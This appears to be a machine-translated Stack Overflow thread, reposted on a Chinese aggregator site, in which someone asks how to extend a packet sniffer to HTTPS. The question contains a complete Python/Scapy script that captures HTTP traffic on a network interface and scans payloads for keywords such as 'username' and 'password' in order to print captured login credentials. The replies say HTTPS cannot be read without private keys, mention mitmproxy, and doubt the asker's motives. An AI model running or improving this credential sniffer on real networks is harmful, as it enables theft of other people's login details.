[英]How do I add support to sniff HTTPS packets here?
到目前為止,我已經能夠使用它來過濾和查看 HTTP 請求和數據包。 如何包含額外的支持以類似地查看 HTTPS 數據包?
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >>> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\nEntered login credentials >>> " + login_info + "\n\n")
sniff("eth0")
簡短的回答:你不能。
您可能需要更多地研究 HTTPS。 由於所有內容都已加密,因此如果沒有私鑰,您將看不到任何內容。 請參閱https://security.stackexchange.com/a/83039
如果您出於調試目的這樣做,或者this
他們在您已泄露的密鑰上使用 RSA,請查看mitmproxy
。 (我懷疑你正在做任何這些)
我看到你也在關注 Zsecurity 的視頻。 你能像講座中那樣從 Bing 捕獲 url 嗎? 我只能嗅探 http 網址,但在講座中,他顯然能夠捕獲 https 和 Bing 網址。 (我確信 bing 是 https)。
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.